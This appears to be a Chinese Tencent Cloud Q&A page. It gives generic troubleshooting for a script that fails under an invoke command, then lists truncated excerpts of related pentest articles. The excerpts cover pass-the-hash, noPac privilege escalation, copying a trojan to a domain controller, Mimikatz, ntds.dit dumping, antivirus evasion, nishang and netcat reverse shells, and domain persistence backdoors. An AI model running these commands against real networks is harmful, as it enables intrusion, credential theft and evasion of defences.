脚本行在dc上有效，但在使用invoke命令时无效

可能是由于以下几个原因：

权限问题：在使用invoke命令时，可能需要更高的权限才能执行某些操作。请确保您具有足够的权限来执行所需的操作。
环境变量问题：在使用invoke命令时，可能需要设置特定的环境变量才能使脚本行有效。请检查您的环境变量设置，确保所有必要的变量已正确配置。
路径问题：在使用invoke命令时，可能需要指定脚本行的完整路径才能执行。请确保您在invoke命令中正确指定了脚本行的路径。
依赖问题：脚本行可能依赖于某些特定的软件包或库，而在使用invoke命令时这些依赖可能无法满足。请确保您的系统中已安装所有必要的依赖项。

如果以上解决方法都无效，您可以尝试以下步骤来进一步排查问题：

检查日志：查看invoke命令的输出日志，看是否有任何错误或警告信息，以帮助确定问题所在。
调试脚本：尝试在invoke命令中添加调试选项，以便更详细地查看脚本行的执行过程。例如，您可以使用"-x"选项来显示每个执行的命令。
检查invoke命令的参数：确保您正确地传递了所有必要的参数给invoke命令，以便正确执行脚本行。

如果您需要进一步的帮助，建议您参考腾讯云的云计算文档和相关产品文档，以获取更详细的信息和解决方案。腾讯云提供了丰富的云计算产品和服务，例如云服务器、云函数、容器服务等，可以满足各种应用场景的需求。您可以访问腾讯云官方网站（https://cloud.tencent.com/）了解更多信息。

相关·内容

内网渗透｜谈谈HASH传递那些世人皆知的事

生成一个msf木马shell.exe，将shell.exe上传到Windows 7主机，然后直接使用 copy 命令将shell.exe复制到域控上： copy shell.exe \\DC.whoamianony.org...使用 Invoke-SMBExec 脚本该脚本通过 SMB 在目标主机创建服务来执行命令，该脚本执行命令没有回显，我们可以用它执行一些木马程序。...Invoke-TheHash 脚本 Invoke-TheHash 脚本可以用来通过哈希传递在远程主机上执行 WMI 和 SMB 命令。...本地帐户或在用户名后使用@domain时不需要此参数。•-Hash：用于身份验证的NTLM密码哈希（格式：LM:NTLM 或 NTLM）。•****-Command：**在目标上执行的命令。...使用以下命令可以成功列举出域控制器上的共享文件： Import-Module.

1.7K2 0

域内提权之sAMAccountName欺骗

在请求服务票证之前需要首先签发票证授予票证(TGT)，当为密钥分发中心 (KDC)中不存在的帐户请求服务票证时，密钥分发中心将跟进在该帐户上附加 $符号的搜索，将此行为与对sAMAccountName...Invoke-noPac，它将.NET 程序集noPac嵌入到base64中，由于该工具实际上是noPac，因此可以使用相同的参数来检索票证 Import-Module ....S4U2self kerberos扩展代表域管理员请求服务票证，由于原始票据属于dc用户，但由于sam帐户名称已被重命名，因此Kerberos将查找dc$，它是一个有效的机器帐户，并将为所请求的服务签发票据...以下命令将验证域升级，因为标准用户可以枚举域控制器上C$文件夹的内容 dir \\dc.purple.lab\c$ 同样如果初始植入是基于PowerShell的，则可以从Invoke-noPac脚本中使用相同的命令行参数...，正如上面已经提到的它实际上是noPac C#工具的包装器 Invoke-noPac -command "-domain purple.lab -user pentestlab -pass Password1234

9971 0

横向移动之WinRM横向移动

，基于VBS脚本并使用了WinRM Scritping API winrs.exe：基于命令行的工具，此工具作为客户端使用，用于远程连接运行WinRM的服务器并执行大多数的cmd命令通过winrs.exe...来执行远程命令利用 Winrs.exe 是一个内置的命令行工具,它允许远程命令的执行在WinRm的适当的有资格的用户。...-u[sername]:USERNAME - 在命令行上指定用户名。如果未指定该用户名，则工具将使用协商身份验证或提示指定名称。...如果远程用户不是目标系统上的本地管理员，则需要使用该选项 (默认设置将导致错误)。...-[use]ssl - 在使用远程终结点时使用 SSL 连接。指定该传输 "https:" 以外的设置时，将使用默认的 WinRM 默认端口。 -?

4.4K1 0

如何在Azure VMs中大规模运行PowerShell？

你可以使用Azure Automation（自动化）在Azure VM上运行命令，但是本文我们将重点关注Invoke-AzureRmVMRunComman命令（AzureRM模块的一部分）。...以下是VM上的Invoke-Mimikatz.ps1脚本的运行示例（没有登录真实帐户）。...但在大多数情况下，我对美国地区和标准的Windows Server 2012映像都很满意。在我的测试中，Invoke-Mimikatz.ps1脚本通常需要大约30-60秒才能运行。...你可以为此设置警报，除非Invoke-AzureRmVMRunCommand是VM管理过程中不可或缺的一部分，否则应该很容易被检测到当有人使用这个命令时。...以下设置将在任何人尝试使用该命令（成功或失败）时通知你。你还可以将该警报的范围扩展到订阅中的所有VM。 ?

8101 0

Active Directory渗透测试典型案例（2）特权提升和信息收集

您可以选择使用MSBuild.exe，这是一个Windows二进制文件，它构建C＃代码（默认情况下也安装在Windows 10中，作为.NET的一部分），以XML格式运行命令和控制（C2）有效载荷，允许然后攻击者使用底层...ST在命令下执行使用–at exec参数在CME上执行有效负载时，可以将权限升级到SYSTEM权限以下是使用非域管理员用户凭据的全新Windows 10安装中的POC ?...然后，我使用CME执行将在攻击者机器上获取XML文件的命令。我在silenttrinity中生成XML有效负载，然后通过smb server.py将其托管在我的smb服务器上。...Exchange 2013是使用Windows 2012 R2服务器上的默认方法安装的，我对PrivExchange python脚本进行了此修改，以使其在没有有效SSL证书的情况下工作。...使用rsmith的特权在DC上转储哈希值通过对所有用户使用哈希，现在可以破解它们了。

2.6K2 0

记一次powershell的免杀之路（绕过360、火绒）

2、PowerShell脚本可以运行在内存中，不需要写入磁盘。 3、几乎不会触发杀毒软件。 4、可以远程执行。 5、目前很多工具都是基于PowerShell开发的。...文件的像素中对 PowerShell 脚本进行编码，并生成要执行的 oneliner Invoke-PSImage 使用 PowerShell 脚本并将脚本的字节编码为 PNG 图像的像素。...它生成一个oneliner，用于从网络上的文件或文件中执行。它可以仅使用有效载荷数据创建新图像，也可以将有效载荷嵌入现有图像的最低有效字节中，使其看起来像一张真实的图片。...创建新图像时，普通的 PowerShell 脚本实际上会被大大压缩，通常会生成一个文件大小约为原始脚本 50% 的 png。使用嵌入方法，每个像素中 2 个颜色值的最低有效 4 位用于保存有效负载。...ps1代码⾃身免杀，但在⽤powershell执⾏远程下载或执⾏shellcode时，很容易触发杀软⾏为规则。

6.1K1 0

我所了解的内网渗透 - 内网渗透知识大总结

在Windows域环境下，身份验证服务和票据授予服务可同时运行在任何可写域控服务器上。...用户在申请票证授予服务（TGS）票证（TGS-REQ）时向TG提交TGT.DC打开TGT并验证PAC校验和 - 如果DC可以打开票证和校验和签出，则TGT =有效.TGT中的数据被有效地复制来创建TGS...使用NTDSUTIL的IFM创建（VSS卷影副本）在DC上本地引用NTDS.DIT NTDSUtil是本地处理AD DB的命令实用程序（ntds.dit），并为DCPromo启用IFM集创建.IFM与DCPromo...PowerShell提取ntds.dit 使用PowerSploit的Invoke-NinjaCopy远程提取ntds.dit（需要在目标DC上启用PowerShell远程处理功能）。...Invoke-NinaCopy是一个PowerShell函数，它可以利用PowerShell远程处理（必须在目标DC上启用PowerShell远程处理），从远程计算机上复制文件（即使文件已锁定，可直接访问文件

4.2K5 0

安全工具 | PowerSploit使用介绍

目录 PowerSploit PowerSploit的用法 PowerView.ps1脚本的使用 PowerUp.ps1脚本的使用 Invoke-Allchecks模块 Invoke-NinjaCopy.ps1...脚本的使用 ?...我们先下载PowerView.ps1脚本到本地，然后在当前目录下打开cmd，执行以下命令执行PowerView.ps1脚本中的Get-NetDomain模块，如果要执行该脚本的其他模块，亦是如此 powershell...比如在每次重启系统时，Java升级程序都会检测出Oracle网站是否有新版Java程序。而类似Java程序之类的系统服务程序，在加载时往往都是运行在系统权限上的。...Invoke-NinjaCopy.ps1脚本的使用该脚本在Exfiltration目录下，该文件的作用是复制一些系统无法复制的文件，比如sam文件。

5.5K2 0

工具的使用|PowerSploit脚本的用法

目录 PowerSploit PowerSploit的用法 PowerView.ps1脚本的使用 PowerUp.ps1脚本的使用 Invoke-Allchecks模块 Invoke-NinjaCopy.ps1...我们先下载PowerView.ps1脚本到本地，然后在当前目录下打开cmd，执行以下命令执行PowerView.ps1脚本中的Get-NetDomain模块，如果要执行该脚本的其他模块，亦是如此 powershell...Invoke-UserEventHunter #根据用户日志获取某域用户登陆过哪些域机器 PowerUp.ps1脚本的使用 PowerUp.ps1脚本是 Privsec 目录下的一个脚本，功能非常强大...比如在每次重启系统时，Java升级程序都会检测出Oracle网站是否有新版Java程序。而类似Java程序之类的系统服务程序，在加载时往往都是运行在系统权限上的。...Invoke-NinjaCopy.ps1脚本的使用该脚本在Exfiltration目录下，该文件的作用是复制一些系统无法复制的文件，比如sam文件。

1.7K1 0

反弹shell的学习总结 - Part 1

0x02：Powershell反弹shell Windows PowerShell 是一种命令行外壳程序和脚本环境，使命令行用户和脚本编写者可以利用 .NET Framework的强大功能。...nishang反弹shell Nishang（https://github.com/samratashok/nishang）是一个基于PowerShell的攻击框架，集合了一些PowerShell攻击脚本和有效载荷...Invoke-PowerShellTcp是基于TCP协议的Powershell正向连接或者反向连接shell，其参数如下： - IPAddress 反向连接时设置的IP - Port 正向连接时设置的端口...在攻击者的电脑上执行如下的命令： nc -lup 6005 ? 上述测试是反向连接，那么正向连接的时候，在攻击者的电脑上运行的命令为： nc -nvu 192.168.1.24 4555 ?...:4444/connect’)) 然后复制该命令在被攻击机器上执行即可，便可看到反弹的shell

9242 1

获取域内管理员和用户信息

常规定位域管理员的方法日志：指的是本地机器的管理员日志，可以使用脚本或wevtutil导出查看。...如果存在域账号/本地账号，我们可以使用Nmap的smb-enum-session.nse脚本来获取远程机器的登录会话。...默认情况下，两者都使用，但是它们具有特定的优点和缺点。最好同时使用两者，但在某些情况下，最好优先选择两者。...powerView脚本本地调用 powershell.exe -exec bypass -command "&<import-module 本地脚本路径；invoke-stealithuserhunter..." 域中定位域管理员：Invoke-UserHunter命令，在使用时不需要管理员权限；获取域内所有用户：invoke-stealthuserhunter命令，在使用时不需要管理员权限；隐蔽性高。

7.7K2 0

CS学习笔记 | 15、枚举的命令和方法

4、本地用户本地用户Local User就是系统上的一个标准用户。当我们想在 Windows 命令行下指定一个本地的用户时，可以通过输入 ....0x01 枚举主机和域信任 1、一些问题当进入目标局域网时，需要弄清楚几个问题。 1、我正处在那个域上？ 2、域信任关系是什么样的？ 3、可以登陆哪些域？这些域上有哪些系统？目标是什么？...WIN-P2AASSD1AF1.teamssix.com [PDC] [DS] 站点: Default-First-Site-Name 此命令成功完成当使用 32 位的 payload 运行在...64 位的系统上，并且 nltest 路径不对的时候，可能会提示没有 nltest 这个命令，这时可以尝试使用下面的命令为其指定路径。...PowerView 是由 Will Schroeder 开发的 PowerShell 脚本，该脚本完全依赖于 Powershell 和 VMI ，使用 PowerView 可以更好的收集内网中的信息，在使用之前

7483 0

内网学习笔记 | 4、域内信息收集

5、定位域管理员 psloggedon 在 Windows 上使用 net session 可以查看谁使用了本机资源，但不能查看谁在使用远程计算机资源、谁登录了本地或远程计算机，使用 psloggedon...:对域控制器进行信息收集，可以获取主机信息、用户、可使用密码策略的用户等 smb-enum-users.nse:在进行域渗透时，如获取了域内某台主机权限，但权限有限，无法获取更多的域用户信息，可借助此脚本对域控制器进行扫描...PowerView 脚本 PowerView 脚本中包含了一系列的 powershell 脚本，信息收集相关的脚本有 Invoke-StealthUserHunter、Invoke-UserHunter...PowerView 脚本时，发现找不到Invoke-StealthUserHunter命令，而旧版本的 PowerView 有Invoke-StealthUserHunter命令 Invoke-StealthUserHunter...PowerView 默认使用Invoke-StealthUserHunter如果找不到需要的信息，就会使用Invoke-UserHunter.

3.4K2 0

红队技巧-常规横向手法

先让跳板机与内网目标机DC建立ipc连接。 2. 然后让跳板机使用copy命令远程操作，将metasploit生成的payload文件Gamma.exe复制到目标主机DC系统C盘中。 3....再在目标主机DC上创建一个名称为“backdoor”的服务。...6.当结果读取完成时，调用WMI执行命令删除结果文件，最后当WMIEXEC退出时，删除文件共享。...winrs.exe来执行远程命令利用（使用这个工具需要明文密码） Winrs.exe 是一个内置的命令行工具,它允许远程命令的执行在WinRm的适当的有资格的用户。...通过使用冒号（:)符号将语句分隔在一行上，可以绕过此操作。 ? END

2.1K2 0

内网渗透-导出HASH的多种方式

在编译时，只生成程序的框架，不包含具体的库函数的实现。在运行时，程序会通过动态链接器根据需要加载依赖的库函数。可执行文件相对较小，但在运行时需要依赖目标系统上存在相应的共享库文件。...Invoke-DCSync是一个基于powershell的脚本。...hacke.testlab/administrator@192.168.188.2 Nishang Nishang是一个PowerShell攻击框架，它是PowerShell攻击脚本和有效载荷的一个集合...;;;"Replicating Directory Changes";; -recmute 使用命令行给用户添加dcsync权限通过加载Powershell渗透框架下的PowerView.ps1脚本实现...;;;"Replicating Directory Changes";; -recmute 使用命令行给用户添加dcsync权限通过加载Powershell渗透框架下的PowerView.ps1脚本实现

1301 0

内网信息收集

域内所有查询都通过域控制器(DC)实现，而这个查询会自动使用Kerberos协议进行认证，无须输入账号密码。...SHARING DC *timeout (normal end of scan) ICMP探测对指定网段中的每个IP地址使用ping命令 $ for /L %I in...脚本 $ powershell.exe -nop -exec bypass -c "Import-Module C:\Invoke-Portscan.ps1; Invoke-Portscan -Hosts...返回所有信任 192.168.1.7 的域 $ nltest /domain_trusts /all_trusts /v /server: # 返回域控和其相对应的IP地址,XXXXX是上一条命令结果中的一个域...日志是指本地机器的管理员日志，可以使用脚本或Wevtutil工具导出并查看。会话是指域内每台机器的登陆会话，可以使用netsess.exe或PowerView等工具查询（可匿名查询，无需权限）。

7722 0

用powershell下载文件的姿势你研究过吗？

1.Invoke-WebRequest 说到使用 PowerShell 下载文件，最先想到的就是 Invoke-WebRequest 命令。...比如，这个命令不能运行在 Windows Server core 版本的服务器上，因为它默认不包含 Internet Explorer 二进制文件。...如果这个脚本要运行在 Windows Server Core 版本的服务器上，那这个命令就不适用了。...异步就意味着无需等待上一个任务完成即可执行下一个任务，多个命令可以并行执行。虽然在单任务状态下较慢，但在多任务的情况下能提高效率。...另外，虽然 BITS 在许多机器上默认可用，但是你不能保证在所有的机器上都可以使用 BITS ，除非你在你的机器上确保已经开启了 BITS 。

8.5K0 2

渗透测试常规操作记录（下）

把生成的dmp文件转移到win系统上使用mimikatz即可获得hash，当然也可以在linux上使用pypykatz。 ? ?...域控：dc.zone.com 域内机器：sub2k8.zone.com 域内普通用户：y 域内机器是不能访问dc上的文件 ?...需运行在域控制器上，本次演示的是新建后门账户，若是给已知账户密码的服务账户添加功能，步骤一致。...httphandler映射可指定一个后缀执行命令保存文件在web服务器上，再读取结果。...在nginx.conf中http节处添加，指定lua脚本位置，以及nginx启动时加载的脚本 ?

5.5K5 0

Red Team 常用 Powershell 脚本

各种常用PowerShell脚本： Search-EventForUser.ps1：在 Windows 事件日志中搜索特定用户的 Powershell 脚本 Search-FullNameToSamAccount.ps1...：SamAccountName 的全名 Search-UserPassword.ps1：在 LDAP 中搜索 userPassword 字段 Remote-WmiExecute.ps1：使用 WMI 远程执行命令...：使用协议处理程序运行您的命令以绕过某些检测 Add-UserLogonScript：为特定用户添加登录脚本 Search-EventForUser.ps1 用法 module-import ....\Search-EventForUser.ps1; Search-EventForUser -TargetUser MrUn1k0d3r -ComputerName DC01 module-import...\Get-ProcessList.ps1; Get-ProcessList Remote-RegisterProtocolHandler.ps1 用法此 cmdlet 创建将调用您的有效负载的协议处理程序

7052 0

内网渗透基石篇—权限维持分析

DSRM的用途是：允许管理员在域环境中出现故障或崩溃时还原、修复、重建活动目录数据库，使环境的运行恢复正常。修改方法。修改DSRM密码的基本原理是在DC上运行ntdsutil命令行工具。...重启进入 DSRM 时，你才能使用 DSRM 管理员帐户。...1.实验操作分别输人如下命令，使用Invoke RefletivePEIniection.psl将HookPasswordChange.dl注入内存，在目标系统中启动管理员权限的PowerShell...Invoke- ADSBackdoor Invoke-ADSBackdoor脚本能够在NTFS数据流中留下一个永久性的后门。这种方法的威胁是很大的，因为其留下的后门是永久性的，且不容易被发现。...Invoke-ADSBackdoor脚本用于向ADS注入代码并以普通用户权限运行。

1.4K4 0

点击加载更多

扫码

添加站长进交流群

领取专属 10元无门槛券

手把手带您无忧上云